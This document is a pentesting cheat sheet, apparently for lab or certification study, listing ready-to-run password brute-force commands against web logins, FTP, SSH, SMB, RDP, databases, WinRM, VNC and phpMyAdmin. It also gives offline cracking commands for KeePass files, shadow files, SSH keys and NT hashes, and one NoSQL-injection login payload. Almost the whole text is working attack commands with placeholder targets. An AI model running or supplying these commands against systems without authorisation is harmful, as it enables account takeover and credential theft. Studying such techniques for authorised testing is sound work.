
Bruteforce

Basic Auth

hydra

hydra -L user.txt -P pass.txt -s 80 -f $IP http-get / 
medusa
medusa -h $IP -U user.txt -P pass.txt -M  http -m DIR:/webdav/ -T 10

Form Auth

hydra

hydra $IP http-post-form "/login.php:username=^USER^&password=^PASS^:invalid" -l <USER> -P <PASS_FILE> -vV -f
ffuf
ffuf -w <PASS_FILE> -X POST -d "username=admin&password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -u http://<IP>/login.php -x http://127.0.0.1:8080 -fs 206
wfuzz
wfuzz -c -z file,<USER_NAMES_FILE> --sc 302 -d 'username=FUZZ&password[$ne]=NO_VALID_PASS&login=login' http://$URL

FTP

hydra

hydra -C /usr/share/wordlists/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt $IP ftp
hydra
hydra -L user.txt -P pass.txt ftp://$IP -I

SSH

hydra

hydra -l root -P pass.txt ssh://$IP -I -f
hydra -L user.txt -P pass.txt ssh://$IP -I -f
nmap
nmap -p 22 --script ssh-brute --script-args userdb=users.lst,passdb=pass.lst \
      --script-args ssh-brute.timeout=4s <target>

SMB

crackmapexec

crackmapexec smb $IP -u user.txt -p pass.txt
hydra
hydra -L user.txt -P pass.txt $IP smb

RDP

ncrack

ncrack -vv --user <USER> -P <PASS_FILE> rdp://$IP
hydra
hydra -V -f -L <USER_LIST> -P <PASS_FILE> rdp://$IP
crowbar
crowbar -b rdp -s $IP -u <USER> -C <PASS_FILE> -n 1

mysql

medusa

medusa -h $IP -M mysql -u root -P /usr/share/wordlists/rockyou.txt -t 20 -f
hydra
hydra -l root -P /usr/share/wordlists/rockyou.txt $IP mysql -t 20 -f

PostgreSQL

hydra

hydra -l postgres -P /usr/share/wordlists/rockyou.txt $IP postgres
hydra -L user.txt -P /usr/share/wordlists/rockyou.txt <IP> postgres
medusa
medusa -h $IP -u postgres -P /usr/share/wordlists/rockyou.txt -M postgres
medusa -h <IP> -U /root/Desktop/user.txt -P /usr/share/wordlists/rockyou.txt -M postgres
ncrack
ncrack -v -U user.txt -P /usr/share/wordlists/rockyou.txt $IP:5432
patator
patator pgsql_login host=<IP> user=FILE0 0=user.txt password=FILE1 1=pass.txt
metasploit
use auxiliary/scanner/postgres/postgres_login
nmap
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 $IP

WinRM

crackmapexec - brute force

crackmapexec winrm $IP -d $domainName -u user.txt -p pass.txt
crackmapexec - check a pair of credentials
crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password> -x "whoami"
crackmapexec - check if the creds are valid to access winrm
crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> -X '$PSVersionTable'

IRC

nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=users.txt,passdb=/usr/share/wordlists/rockyou.txt  -p 6697 $IP

kdbx

keepass2john CEH.kdbx > ceh.hash
john ceh.hash --wordlist=/usr/share/wordlists/rockyou.txt
kpcli --kdb CEH.kdbx

VNC

hydra

hydra -s 5900 -P /usr/share/wordlists/rockyou.txt -t 4 -V -f vnc://$IP
ncrack
ncrack -P /usr/share/wordlists/rockyou.txt $IP:5900
medusa
medusa -h $IP -u gamma -P /usr/share/wordlists/rockyou.txt -M vnc

Unshadow

unshadow passwd shadow > passwd_shadow.txt
john
john passwd_shadow.txt
john passwd_shadow.txt --wordlist=/usr/share/wordlists/rockyou.txt
hashcat
hashcat -m 1800 passwd_shadow.txt /usr/share/wordlists/rockyou.txt -O

Crack id_rsa

ssh2john id_rsa > id_rsa-hash
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa-hash

Crack NT hash

hashcat -m 1000 --force 26112010952d963c8dc4217daec986d9 /usr/share/wordlists/rockyou.txt

phpmyadmin

hydra

export HYDRA_PROXY_HTTP=http://127.0.0.1:8080  

hydra -F -vV -l root -P /usr/share/wordlists/rockyou.txt $IP http-post-form "/phpmyadmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1&token=a6afebdd3311fac747d68adb1a8bd7ca:denied"

medusa

medusa \
  -h $IP \
  -u root \
  -P /usr/share/wordlists/rockyou.txt \
  -M web-form \
  -m FORM:"phpmyadmin/index.php" \
  -m DENY-SIGNAL:"denied" \
  -m FORM-DATA:"post?pma_username=&pma_password=&server=1&&token=i=TQRF[zI*sEkNu@"

SquirrelMail 1.2.10

hydra

hydra -l <USER> -P <PASS_FILE> $IP http-post-form "/webmail/src/redirect.php:username=^USER^&password=^PASS^:F=incorrect" -V -F -u

Create password list

cewl -w pass.lst http://wordpress.hack -d 1
tr '[:upper:]' '[:lower:]' < pass.lst | sort -u > pass2.lst